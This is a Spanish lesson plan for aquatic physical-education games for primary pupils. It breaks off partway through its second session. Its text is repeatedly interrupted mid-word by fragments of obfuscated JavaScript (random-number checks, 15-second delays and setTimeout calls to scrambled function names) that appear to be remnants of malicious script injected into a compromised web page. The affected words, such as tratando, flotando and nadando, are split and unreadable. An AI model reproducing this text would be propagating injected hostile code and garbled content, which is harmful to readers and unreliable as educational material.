UNIDAD DIDÁCTICA EN EL MEDIO ACUÁTICO

Autora: Laura Márquez Benavides

         Esta unidad didáctica permite desarrollar la actividad física  en el medio acuático siempre desde un enfoque educativo, permitiendo conseguir los objetivos planteados, tratandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los  valores sociales. Propondremos juegos motivantes con los que se pongan en práctica las habilidades básicas (desplazamientos, saltos, giros, lanzamientos) y otros contenidos como la respiración y la flotación. 


         Unidad didáctica: actividades físicas en el medio acuático para niños de segundo ciclo.

        Objetivo principal: experimentar, desarrollar las habilidades motrices en un medio diferente al habitual.

OBJETIVOS:

-         Afianzamiento del esquema corporal mediante actividades acuáticas.

-         Trabajar las habilidades básicas (desplazamientos, saltos, giros, etc.) en el medio acuático.

-         Experimentar todas las formas de desplazamiento

-         Mejorar la coordinación y el equilibrio

-         Trabajar la respiración y la relajación en  el medio acuático.

-         Realizar actividad física saludable en el medio acuático mediante juegos

CONTENIDOS

-         Habilidades básicas (salto, desplazamientos, giros, lanzamientos)

-         Lateralidad

-         Respiración, flotación.

-         Participación en los juegos acuáticos

-         Colaboración y respeto hacia uno mismo y a los demás

SESION 1


        Juegos  de calentamiento en el césped de la piscina.

         Distribuimos tablas de flotación por el césped. Un niño la pilla y debe atrapar a otro. Para no ser pillado deben subirse en una tabla.


Carrera de caballitos de mar: Creamos dos grupos: Equipo A y equipo B. Cada equipo se distribuye mitad en un lado y mitad en el otro lado. Los de un lado son los jinetes y están montados en el caballo (fideo de flotación). Este debe dirigirse a montar a otro jinete y traerlo a su zona. Así sucesivamente con todos los componentes del equipo. Gana aquel equipo que trae a todos sus jinetes a su zona.

Ducha antes de entrar en la piscina.

ANIMACIÓN

A salvo de la bruja: un niño la lleva, éste llevará en la mano un fideo. Los demás se desplazan por el agua. Aquel que sea dado por el  fideo será la nueva bruja o brujo. Para no ser pillado, el resto de niños pueden subirse en la colchoneta de flotación, solamente pueden estar diez segundos subidos sobre ella.


PARTE PRINCIPAL.

La Bomba: se colocan todos los niños en fila india (dentro del agua). Deben dirigirse hacia lo ancho de la piscina hasta llegar al bordillo pasándose la pelota por debajo, entre las piernas. El primero que lo ha realizado debe dirigirse rápidamente  a colocarse al final de la fila para ir  avanzandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando. Ídem pero pasársela por encima de la cabeza.

El tiburón. Uno la pilla y debe atrapar a los demás. El que es pillado se queda en el sitio flotandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando. Para ser salvado, un compañero debe pasar entre sus piernas.

Introducimos en la piscinas las gafas de bucear (serán las piedras). Estas caerán al fondo. Los dos equipos situados fuera de la piscina. A la señal, todos deberán introducirse y rescatar el mayor número de piedras.


VUELTA A LA CALMA

La barca: con un fideo de flotación, nos colocamos sobre él en posición supino (boca arriba). Relajamos el cuerpo.

SESIÓN 2


ANIMACIÓN

Juego: nuestro cuerpo. Desplazarse por la piscina nadandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando. A la voz del profesor nombrará una parte del cuerpo a enseñar. Por ejemplo: enséñame la rodilla, pie, codo. Estos deberán enseñar fuera del agua la parte del cuerpo nombrada.


PARTE PRINCIPAL.

Por parejas montados en un fideo (tubo de flotación). Irán cabalgandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando por el agua. A la señal del maestro. Cambio de caballo. Los niños que están colocados atrás deberán  cambiar de caballo. Aquel que lo realice el último. Un punto. Cu